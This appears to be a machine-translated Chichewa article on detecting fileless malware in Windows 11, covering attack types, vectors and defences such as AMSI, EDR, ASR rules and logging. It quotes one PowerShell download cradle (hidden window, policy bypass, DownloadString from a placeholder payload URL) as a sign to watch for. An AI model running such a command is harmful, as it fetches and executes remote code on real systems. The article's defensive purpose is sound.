Momwe mungadziwire pulogalamu yaumbanda yopanda mafayilo mu Windows 11

¿Momwe mungadziwire pulogalamu yaumbanda yowopsa yopanda mafayilo? Ntchito zowukira zopanda mafayilo zakula kwambiri, ndikupangitsa kuti zinthu ziipireipire, Windows 11 sichimatetezedwaNjirayi imadutsa diski ndikudalira kukumbukira ndi zida zovomerezeka zamakina; ndichifukwa chake ma siginecha ofotokoza antivayirasi mapulogalamu amavutika. Ngati mukuyang'ana njira yodalirika yodziwira, yankho lagona pakuphatikiza telemetry, kusanthula machitidwe, ndi zowongolera za Windows.

M'chilengedwe chapano, makampeni omwe amazunza PowerShell, WMI, kapena Mshta amakhala limodzi ndi njira zotsogola monga jakisoni wamakumbukiro, kulimbikira "popanda kukhudza" diski, ngakhale. zolakwika za firmwareChinsinsi ndikumvetsetsa mapu owopseza, magawo owukira, ndi ma sign omwe amachoka ngakhale chilichonse chikachitika mkati mwa RAM.

Kodi pulogalamu yaumbanda yopanda mafayilo ndi chiyani ndipo chifukwa chiyani ili yodetsa nkhawa Windows 11?

Tikamanena za ziwopsezo "zopanda mafayilo", tikunena za code yoyipa Simufunikanso kusungitsa ma executable atsopano mu fayilo ya fayilo kuti igwire ntchito. Nthawi zambiri imalowetsedwa mumayendedwe ndikuchitidwa mu RAM, kudalira omasulira ndi mabinari osainidwa ndi Microsoft (mwachitsanzo, PowerShell, WMI, rundll32, mshtaIzi zimachepetsa phazi lanu ndikukulolani kuti mulambalale mainjini omwe amangoyang'ana mafayilo okayikitsa.

Ngakhale zikalata zamaofesi kapena ma PDF omwe amapezerapo mwayi pakukhazikitsa malamulo amawonedwa ngati gawo lazochitika, chifukwa yambitsani ntchito mu kukumbukira popanda kusiya ma binaries othandiza kuti asanthule. Kugwiritsa ntchito molakwika macros ndi DDE Ku Office, popeza code imayenda m'njira zovomerezeka monga WinWord.

Zigawenga zimaphatikiza uinjiniya wa anthu (phishing, maulalo a sipamu) ndi misampha yaukadaulo: kudina kwa wogwiritsa kumayambitsa unyolo momwe script imatsitsa ndikupereka malipiro omaliza pokumbukira, kupeŵa kusiya njira pa disk. Zolinga zimachokera ku kuba deta kupita ku ransomware execution, kusuntha kwachete kumbuyo.

Mitundu motsatira mapazi mu dongosolo: kuchokera ku 'woyera' kupita ku hybrids

Kuti mupewe kusokoneza malingaliro, ndizothandiza kulekanitsa ziwopsezo ndi kuchuluka kwawo komwe kumayenderana ndi mafayilo. Gululi limafotokoza bwino zomwe zikupitirira, kodi code imakhala kuti, ndipo imasiya zizindikiro zotani?.

Lembani I: palibe ntchito yamafayilo

Pulogalamu yaumbanda yopanda mafayilo sikulemba chilichonse ku diski. Chitsanzo chodziwika bwino ndikugwiritsa ntchito a kusatetezeka kwa intaneti (monga vekitala ya EternalBlue kumbuyo kwatsiku) kuti mugwiritse ntchito chitseko chakumbuyo chokhala mu kernel memory (milandu ngati DoublePulsar). Apa, chilichonse chimachitika mu RAM ndipo palibe zinthu zakale pamafayilo.

Njira ina ndikuyipitsa fimuweya Zazigawo: BIOS/UEFI, ma adapter network, USB peripherals (machitidwe amtundu wa BadUSB) kapena ma CPU subsystems. Iwo amalimbikira poyambitsanso ndikuyikanso, ndizovuta zowonjezera Zogulitsa zochepa zimayendera firmwareIzi ndizowukira zovuta, zocheperako, koma zowopsa chifukwa chakubisa kwawo komanso kulimba.

Mtundu Wachiwiri: Ntchito yosunga zakale mosalunjika

Apa, pulogalamu yaumbanda "siyisiya" yomwe ingagwire ntchito, koma imagwiritsa ntchito zida zoyendetsedwa ndi dongosolo zomwe zimasungidwa ngati mafayilo. Mwachitsanzo, backdoors kuti chomera amalamula powershell m'malo a WMI ndikuyambitsa kuphedwa kwake ndi zosefera zochitika. Ndizotheka kuyiyika kuchokera pamzere wamalamulo popanda kugwetsa ma binaries, koma chosungira cha WMI chimakhala pa disk ngati nkhokwe yovomerezeka, zomwe zimapangitsa kuti zikhale zovuta kuyeretsa popanda kukhudza dongosolo.

Kuchokera pamalingaliro othandiza amawonedwa kuti alibe mafayilo, chifukwa chidebecho (WMI, Registry, etc.) Si tingachipeze powerenga detectable executable Ndipo kuyeretsa kwake sikophweka. Zotsatira zake: kulimbikira mobisa mopanda tsankho pang'ono "zachikhalidwe".

Type III: Imafunikira mafayilo kuti agwire ntchito

Nthawi zina amasunga a 'fileless' kulimbikira Pamlingo womveka, amafunikira choyambitsa mafayilo. Chitsanzo chodziwika bwino ndi Kovter: imalembetsa verebu lachipolopolo kuti liwonjezeke mwachisawawa; Fayilo yokhala ndi zowonjezerazo ikatsegulidwa, script yaying'ono yogwiritsa ntchito mshta.exe imayambitsidwa, yomwe imamanganso chingwe choyipa kuchokera ku Registry.

Chinyengo ndichakuti mafayilo a "nyambo" awa okhala ndi zowonjezera mwachisawawa alibe ndalama zowerengeka, ndipo kuchuluka kwa code kumakhala mu kulembetsa (chidebe china). Ichi ndichifukwa chake amagawidwa kukhala opanda mafayilo, ngakhale kunena mosamalitsa amadalira chimodzi kapena zingapo za disk ngati choyambitsa.

Ma vectors ndi 'makamu' a matenda: komwe amalowa ndi komwe amabisala

Kuti muzindikire bwino, m'pofunika kutchula malo omwe alowa komanso momwe matendawo alili. Malingaliro awa amathandizira kupanga maulamuliro enieni Ikani patsogolo telemetry yoyenera.

zochuluka

• Zotengera mafayilo (Mtundu Wachitatu): Zolemba, zogwiritsiridwa ntchito, mafayilo a Flash/Java, kapena mafayilo a LNK atha kugwiritsa ntchito msakatuli kapena injini yomwe imawasintha kuti alowetse chipolopolo mu kukumbukira. Vector yoyamba ndi fayilo, koma malipiro amapita ku RAM.
• Zotengera maukonde (Mtundu Woyamba): Phukusi lomwe likugwiritsa ntchito chiwopsezo (monga, mu SMB) limakwaniritsa kuphatikizika kwa ogwiritsa ntchito kapena kernel. WannaCry adalimbikitsa njira iyi. Direct memory load popanda fayilo yatsopano.

hardware

• Zida (Mtundu Woyamba): Disk kapena netiweki khadi fimuweya akhoza kusinthidwa ndi code anayambitsa. Zovuta kuyang'ana ndikupitilira kunja kwa OS.
• CPU ndi ma subsystems oyang'anira (Mtundu Woyamba): Tekinoloje monga Intel's ME/AMT awonetsa njira zopitira Networking ndi kuchita kunja kwa OSImaukira pamlingo wotsika kwambiri, wokhala ndi mwayi wobera kwambiri.
• USB (Mtundu Woyamba): BadUSB imakulolani kuti mukonzenso galimoto ya USB kuti mukhale ngati kiyibodi kapena NIC ndi kukhazikitsa malamulo kapena kuwongolera magalimoto.
• BIOS / UEFI (Mtundu Woyamba): kukonza pulogalamu yoyipa ya firmware (milandu ngati Mebromi) yomwe imayambira Windows isanayambike.
• Hypervisor (Mtundu Woyamba): Kukhazikitsa mini-hypervisor pansi pa OS kubisa kukhalapo kwake. Osowa, koma kale anaona mu mawonekedwe a hypervisor rootkits.

Kupha ndi jekeseni

• Zotengera mafayilo (Mtundu III): EXE/DLL/LNK kapena ntchito zokonzedwa zomwe zimayambitsa jakisoni m'njira zovomerezeka.
• Macros (Mtundu III): VBA mu Office imatha kuzindikira ndikulipira zolipira, kuphatikiza ransomware yonse, ndi chilolezo cha wogwiritsa ntchito mwachinyengo.
• Makalata (Mtundu II): PowerShell, VBScript kapena JScript kuchokera pafayilo, mzere wolamula, ntchito, Kulembetsa kapena WMIWowukirayo amatha kulemba script mu gawo lakutali popanda kukhudza disk.
• Mbiri ya Boot (MBR / Boot) (Mtundu Wachiwiri): Mabanja ngati Petya amalemba gawo la boot kuti athe kuwongolera poyambira. Zili kunja kwa fayilo, koma zopezeka kwa OS ndi njira zamakono zomwe zingathe kubwezeretsa.

Momwe kuwukira kopanda mafayilo kumagwirira ntchito: magawo ndi ma sign

Ngakhale samasiya mafayilo omwe angathe kuchitika, makampeni amatsata malingaliro okhazikika. Kuwamvetsetsa kumapangitsa kuti aziwunika. zochitika ndi maubwenzi pakati pa ndondomeko zomwe zimasiya chizindikiro.

• Kufikira koyambaKubera anthu pogwiritsa ntchito maulalo kapena zomata, mawebusayiti osokoneza, kapena mbiri yobedwa. Maunyolo ambiri amayamba ndi chikalata cha Office chomwe chimayambitsa lamulo PowerShell.
• Kulimbikira: kumbuyo kudzera pa WMI (zosefera ndi zolembetsa), Makiyi a registry execution kapena ntchito zomwe zakonzedwa zomwe zimatsegulanso zolemba popanda fayilo yatsopano yoyipa.
• ExfiltrationZambiri zikasonkhanitsidwa, zimatumizidwa kunja kwa netiweki pogwiritsa ntchito njira zodalirika (osatsegula, PowerShell, bitsadmin) kusakaniza traffic.

Chitsanzo ichi ndi chobisika kwambiri chifukwa cha zizindikiro zowononga Amabisala mwachizolowezi: mikangano ya mzere wa malamulo, unyolo wamachitidwe, kulumikizana modabwitsa, kapena kupeza ma API a jakisoni.

Njira zodziwika bwino: kuyambira kukumbukira mpaka kujambula

Osewera amadalira zosiyanasiyana njira zomwe zimakulitsa zobisika. Ndizothandiza kudziwa zodziwika bwino kuti mutsegule kuzindikira.

• Mkazi mu kukumbukira: Kukweza zolipirira mu danga la njira yodalirika yomwe imadikirira kuyambitsa. rootkits ndi ndowe Mu kernel, amakweza kuchuluka kwa zobisika.
• Kulimbikira mu RegistrySungani mabulogu obisika m'makiyi ndikuwatsitsimutsanso kuchokera pa choyambitsa chovomerezeka (mshta, rundll32, wscript). The ephemeral installer akhoza kudziwononga yekha kuti achepetse phazi lake.
• Mbiri yachinyengoPogwiritsa ntchito mayina olowera ndi achinsinsi omwe adabedwa, wowukirayo amatulutsa zipolopolo zakutali ndi zomera kulowa mwakachetechete mu Registry kapena WMI.
• 'Fileless' RansomwareKulembera ndi kulumikizana kwa C2 kumapangidwa kuchokera ku RAM, kuchepetsa mwayi wodziwikiratu mpaka kuwonongeka kukuwonekera.
• Zida zogwirira ntchito: maunyolo odzipangira okha omwe amazindikira zofooka ndikutumiza zolipira zokumbukira wogwiritsa ntchito akadina.
• Zolemba ndi code: ma macros ndi makina ngati DDE omwe amayambitsa kulamula osasunga zomwe zichitike ku disk.

Maphunziro amakampani awonetsa kale nsonga zodziwika bwino: mu nthawi imodzi ya 2018, a kuchuluka kwa 90% mu script-based and PowerShell chain attack, chizindikiro chakuti vekitala imakondedwa chifukwa cha mphamvu yake.

Vuto lamakampani ndi ogulitsa: chifukwa chiyani kuletsa sikukwanira

Zingakhale zokopa kuletsa PowerShell kapena kuletsa ma macro kwamuyaya, koma Mutha kuswa opareshoniPowerShell ndi mzati wa kayendetsedwe kamakono ndipo Office ndiyofunikira mu bizinesi; kutsekereza mwakhungu nthawi zambiri sikutheka.

Kuphatikiza apo, pali njira zolambalala zowongolera zoyambira: kuyendetsa PowerShell kudzera mu DLLs ndi rundll32, kuyika zolemba mu EXEs, Bweretsani kope lanu la PowerShell kapenanso kubisa zolembedwa pazithunzi ndikuzichotsa kukumbukira. Choncho, chitetezo sichingakhazikike pokhapokha kukana kukhalapo kwa zida.

Kulakwitsa kwina kofala ndikugawa chisankho chonse kumtambo: ngati wothandizira akuyenera kudikirira yankho kuchokera kwa seva, Mukutaya nthawi yeniyeni kupewaZambiri za Telemetry zitha kukwezedwa kuti zilemeretse zambiri, koma Kuchepetsa kuyenera kuchitika kumapeto.

Momwe mungadziwire pulogalamu yaumbanda yopanda fayilo mkati Windows 11: telemetry ndi khalidwe

Njira yopambana ndi kuyang'anira ndondomeko ndi kukumbukiraOsati mafayilo. Makhalidwe oyipa amakhala okhazikika kuposa momwe fayilo imatengera, zomwe zimawapangitsa kukhala abwino kwa injini zopewera.

• AMSI (Antimalware Scan Interface)Imasokoneza zolemba za PowerShell, VBScript, kapena JScript ngakhale zitapangidwa mwanzeru. Zabwino kwambiri pojambula zingwe zobisika musanayambe kuphedwa.
• Kuwunika ndondomeko: kuyamba/kumaliza, PID, makolo ndi ana, njira, malamulo mizere ndi ma hashes, kuphatikiza mitengo yakupha kuti mumvetsetse nkhani yonse.
• Kusanthula kukumbukira: kuzindikira kwa jakisoni, zowunikira kapena PE zonyamula popanda kukhudza diski, ndikuwunikanso madera osazolowereka.
• Chitetezo cha gawo loyamba: kuwongolera ndi kubwezeretsa kwa MBR/EFI ngati kusokonezedwa.

Mu Microsoft ecosystem, Defender for Endpoint imaphatikiza AMSI, kuyang'anira khalidweKusanthula pamtima ndi kuphunzira pamakina opangidwa ndi mitambo kumagwiritsidwa ntchito kukulitsa zozindikirika ndi mitundu yatsopano kapena yosadziwika bwino. Ogulitsa ena amagwiritsa ntchito njira zofananira ndi ma injini okhala ndi kernel.

Chitsanzo chenicheni cha kulumikizana: kuchokera pa chikalata kupita ku PowerShell

Ingoganizirani unyolo pomwe Outlook imatsitsa cholumikizira, Mawu amatsegula chikalatacho, zomwe zikugwira zimayatsidwa, ndipo PowerShell imayambitsidwa ndi magawo okayikitsa. Telemetry yoyenera idzawonetsa Lamulo lolamula (mwachitsanzo, ExecutionPolicy Bypass, zenera lobisika), kulumikiza ku domeni yosadalirika ndikupanga njira yamwana yomwe imadziyika yokha mu AppData.

Wothandizira yemwe ali ndi zochitika zapaderalo ndi wokhoza imani ndi bwererani zochita zoyipa popanda kulowererapo pamanja, kuphatikiza pakudziwitsa SIEM kapena kudzera pa imelo/SMS. Zogulitsa zina zimawonjezera maziko oyambira (mitundu yamtundu wa StoryLine), zomwe sizilozera kumayendedwe owoneka (Outlook/Word), koma ku ulusi woyipa wathunthu ndi chiyambi chake kuyeretsa bwinobwino dongosolo.

Chitsanzo chodziwika bwino cha malamulo omwe muyenera kuyang'anira chikhoza kuwoneka motere: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logic si chingwe chenicheni, koma gulu la zizindikiro: ndondomeko yodutsa, zenera lobisika, kutsitsa bwino, ndi kukumbukira kukumbukira.

AMSI, mapaipi ndi udindo wa wosewera aliyense: kuchokera kumapeto mpaka ku SOC

Kupitilira kujambula zolemba, zomanga zolimba zimapanga njira zomwe zimathandizira kufufuza ndi kuyankha. Umboni wochuluka musanapereke katunduyo, ndi bwino., chabwino.

• Kusokoneza scriptAMSI imapereka zomwe zili (ngakhale zitapangidwa powuluka) kuti ziwunikidwe mokhazikika komanso mosintha pamapaipi a pulogalamu yaumbanda.
• Njira zochitikaMa PID, ma binaries, hashes, mayendedwe, ndi zina zimasonkhanitsidwa. mikangano, kukhazikitsa mitengo ya ndondomeko yomwe inatsogolera ku katundu womaliza.
• Kuzindikira ndi kupereka lipotiZomwe zimazindikirika zimawonetsedwa pazogulitsa zogulitsa ndikutumizidwa kumapulatifomu a netiweki (NDR) kuti muwonetsetse kampeni.
• Zitsimikizo za ogwiritsaNgakhale script italowetsedwa mu kukumbukira, chimango AMSI imasokoneza m'mitundu yogwirizana ya Windows.
• Kuthekera kwa woyang'anira: kasinthidwe ka mfundo kuti athe kuyang'anira zolemba, kuletsa motengera khalidwe ndikupanga malipoti kuchokera ku console.
• SOC ntchito: kuchotsa zinthu zakale (VM UUID, mtundu wa OS, mtundu wa script, njira yoyambira ndi kholo lake, ma hashes ndi mizere yamalamulo) kuti akonzenso mbiri ndi malamulo okweza m'tsogolo.

Pamene nsanja amalola exporting ndi memory buffer Mogwirizana ndi kuphedwa, ofufuza amatha kupanga zodziwikiratu zatsopano ndikuwonjezera chitetezo ku mitundu yofananira.

Njira zothandiza mu Windows 11: kupewa ndi kusaka

Kuphatikiza pa kukhala ndi EDR ndi kukumbukira kukumbukira ndi AMSI, Windows 11 imakulolani kutseka malo owukira ndikuwongolera mawonekedwe ndi zowongolera mbadwa.

• Kulembetsa ndi zoletsa mu PowerShellImayatsira Script Block Logging ndi Module Logging, imagwiritsa ntchito njira zoletsedwa ngati kuli kotheka, ndikuwongolera kugwiritsa ntchito Kulambalala/Kubisika.
• Malamulo a Attack Surface Reduction (ASR).: imaletsa kukhazikitsidwa kwa script ndi Office process ndi Kugwiritsa ntchito WMI/PSExec ngati sikufunika.
• Ndondomeko zazikulu za Office: imalepheretsa mwachisawawa, kusaina kwakukulu kwamkati ndi mindandanda yodalirika yodalirika; amayang'anira cholowa DDE ikuyenda.
• WMI Audit ndi Registry: imayang'anira kulembetsa kwa zochitika ndi makiyi opangira okha (Run, RunOnce, Winlogon), komanso kupanga ntchito kukonzedwa.
• Chitetezo choyambirira: imayambitsa Boot Yotetezedwa, imayang'ana kukhulupirika kwa MBR/EFI ndikutsimikizira kuti palibe zosintha poyambira.
• Patching ndi kuumitsa: imatseka zovuta zomwe zingachitike mu asakatuli, zigawo za Office, ndi mautumiki apanetiweki.
• Kuzindikira: imaphunzitsa ogwiritsa ntchito ndi magulu aukadaulo mu phishing ndi ma sign a kuphedwa mobisa.

Pakusaka, yang'anani pa mafunso okhudza: kupanga njira ndi Office ku PowerShell/MSHTA, mikangano ndi downloadstring/downloadfileZolemba zomveka bwino, jakisoni wowunikira, ndi maukonde otuluka kupita ku ma TLD okayikitsa. Lembani zizindikiro izi ndi mbiri komanso pafupipafupi kuti muchepetse phokoso.

Kodi injini iliyonse ingazindikire chiyani lero?

Mayankho amakampani a Microsoft amaphatikiza AMSI, kusanthula kwamakhalidwe, fufuzani kukumbukira ndi chitetezo cha gawo la boot, kuphatikiza mitundu ya ML yochokera pamtambo kuti ithane ndi ziwopsezo zomwe zikubwera. Ogulitsa ena amagwiritsa ntchito kuwunika kwa kernel kuti asiyanitse zoyipa kuchokera ku pulogalamu yabwino ndikubweza zosintha zokha.

Njira yozikidwa pa nkhani za kuphedwa Zimakuthandizani kuti muzindikire chomwe chimayambitsa (mwachitsanzo, cholumikizira cha Outlook chomwe chimayambitsa unyolo) ndikuchepetsa mtengo wonse: zolemba, makiyi, ntchito, ndi ma binaries apakatikati, kupewa kumamatira pachizindikiro chowoneka.

Zolakwa zofala ndi momwe mungapewere

Kuletsa PowerShell popanda dongosolo lina loyang'anira sikungothandiza, komanso kulipo njira zodziyitanira mwanjira inaZomwezo zimagwiranso ntchito kwa ma macros: mwina mumawawongolera ndi mfundo ndi ma signature, kapena bizinesiyo idzavutika. Ndi bwino kuganizira kwambiri telemetry ndi makhalidwe malamulo.

Kulakwitsa kwina kofala ndikukhulupilira kuti zolembera zoyera zimathetsa chilichonse: ukadaulo wopanda mafayilo umadalira izi. mapulogalamu odalirikaOyang'anira akuyenera kuyang'ana zomwe akuchita ndi momwe akukhudzira, osati ngati akuloledwa.

Ndi zonse zomwe tafotokozazi, pulogalamu yaumbanda yopanda fayilo imasiya kukhala "mzimu" mukamawunika zomwe zili zofunika kwambiri: khalidwe, kukumbukira, ndi chiyambi za kuphedwa kulikonse. Kuphatikiza AMSI, telemetry process telemetry, mbadwa Windows 11 zowongolera, ndi EDR wosanjikiza ndi kusanthula kwamakhalidwe kumakupatsani mwayi. Onjezani ku mfundo zenizeni za equation za macros ndi PowerShell, WMI/Registry auditing, ndi kusaka zomwe zimayika patsogolo mizere yamalamulo ndikukonza mitengo, ndipo muli ndi chitetezo chomwe chimadula maunyolo awa asanamveke.